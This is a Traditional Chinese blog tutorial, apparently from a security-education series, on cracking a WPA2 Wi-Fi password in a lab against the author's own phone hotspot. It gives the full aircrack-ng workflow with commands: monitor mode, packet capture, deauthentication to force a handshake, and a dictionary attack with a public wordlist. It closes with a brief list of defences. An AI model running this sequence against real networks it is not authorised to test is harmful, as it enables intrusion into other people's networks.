上一篇[Day32]駭客思維x教育不能等xWiFi網路安全中，得到不少前輩的指點與討論…

無線網路加密協定

• WEP
• WPA
• WP2

協定演化

圖片來源

看圖說故事

好哦我知道大家都很聰明一定能看得懂!!!!!

實作驗證

由於手邊沒有適合的 WiFi 哦，就以手機熱點為例(WPA2)

• 預備環境
  • Lab 環境(VM)
  • Kali Linux：https://www.kali.org/downloads/
  • 無線網卡(AP)
  • 密碼檔 請你的駭客朋友提供或找網路資源 邊緣人沒朋友嗚嗚
  • 有連線上 WiFi 的其他網路裝置或設備
  • 破解密碼時的耐心

實作準備

所以想要側錄封包要怎麼做呢？
首先，要先買一隻外接的無線網卡！！！！！

我實驗室同學志強大大推薦這隻：TL-WN722N
因為外型很酷炫，而且 NT300 內搞定！
https://www.tp-link.com/tw/support/download/tl-wn722n/

但是在下面的實作 Windows + Kali 的環境下，可能會有抓取不到 wlan0 的問題，
也沒辦法指定相關的網路介面…

在英明神武的泰宏老師的指導下，可以參考網址內的操作來解決這樣的問題。
https://www.hackster.io/thatiotguy/enable-monitor-mode-in-tp-link-tl-wn722n-v2-v3-128fc6
安裝完成後並重新啟動Kali，就可以排除這樣的問題了，就可以省下買 macOS 的錢了 XD

• 實作步驟

(1) 開啟 Kali Terminal 檢查連線狀態

lsusb 

檢查 USB 是否已連接上VM

airmon -ng

用於改變為無線網卡連線，以便其他工具順利使用
//若沒有抓到無線網卡請檢查VM 網路設定，請連接至VM中。

(2) airmon 監聽模式

airmon-ng check

檢查是否有影響到的程序

airmon-ng check kill

把可能會影響到的程序殺掉

airmon-ng

airmon-ng start wlan0

若是第一次設定的話，系統可能說顯示不可用，請再重覆執行「airmon-ng」
這次就會給一個新的 interface

airmon-ng

airmon-ng start wlan0mon

好的，我們可以看到無線網卡有正常抓到此次實驗的手機熱點目標(AlexALiu)。

airodump-ng wlan0mon

執行分兩個區塊，上面的區塊是該網卡目前抓取到的連線
下面則是目前連線到該裝置 Client
將紅色框框內的東西複製起來，供後續指令使用

airodump-ng -c [channel number] --bssid [bssid] -w [/root/Destop/] [moniter interace]

airodump-ng -c 6 --FA:CF:9C:60:3A:B6 -w /root/Destop/ wlan0mon

將監聽檔的 Log 儲存在桌面，指定僅觀察這個連線

//WPA handshake 未找到 Key 時不會顯示是因為我擷圖的時候已經抓到 Key了 XD

另外再開一個 Terminal 當作發送

aireplay-ng -0 2 -a[router bssid] -c[client bssid] [monitoring interface name]

aireplay-ng -0 2 -a FA:CF:9C:60:3A:B6  -c  3C:A9:F4:8C:63:B8 wlan0mon

發送兩個封包去催眠裝置(3C:A9:F4:8C:63:B8)，這個是我的筆電，催眠它說你已經過期了快重送密碼做握握手連線吧，讓它斷線後重新再連線，就可以在另外一個 Terminal 找到，在第一個 Terminal 中的監聽中就會有收到 WPA handshake (可能會跟STATION相同，但大部份會不同，嗚嗚實驗環境嘛)

aircrack-ng -a2 -b[rounter bssid] -w[path to wordlist] [/root/Destop]/*.cap

aircrack-ng -a2 -b FA:CF:9C:60:3A:B6 -w /root/Destop/pass.txt  /root/Destop/*.cap

//剛剛跟駭客朋友要來的密碼字典檔(pass.txt)我存在桌面哦 =v=+
或是沒有的話，可以到這裡下載：
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Common-Credentials
全球爛密碼 TOP 10 、TOP 100、TOP 1000 …
看你時間跟資源下去跑字典檔。

然後，就找到這個連線的密碼了 ：)
所以，知道密碼，你就可以連進內網了，那麼，連進內網你可以幹嘛呢？

… … …
不過，其他無線網路的破解方式可以同理可證，大部份都可以用 airmon，不同的攻擊手法，就是要大量的做 handshake 封包去做解密，我們在實驗的時候，嘗試參數先下個 5000 次這樣嘗試看看，一樣需要大量的耐心。

防禦方式

• 使用無線入侵偵測（WIPS）
• 選用不易破解的加密架構
• 設備認證機制
• 使用者認證機制
• 權限管理機制

自動工具

轉 15款免費 WiFi（入侵破解）安全測試工具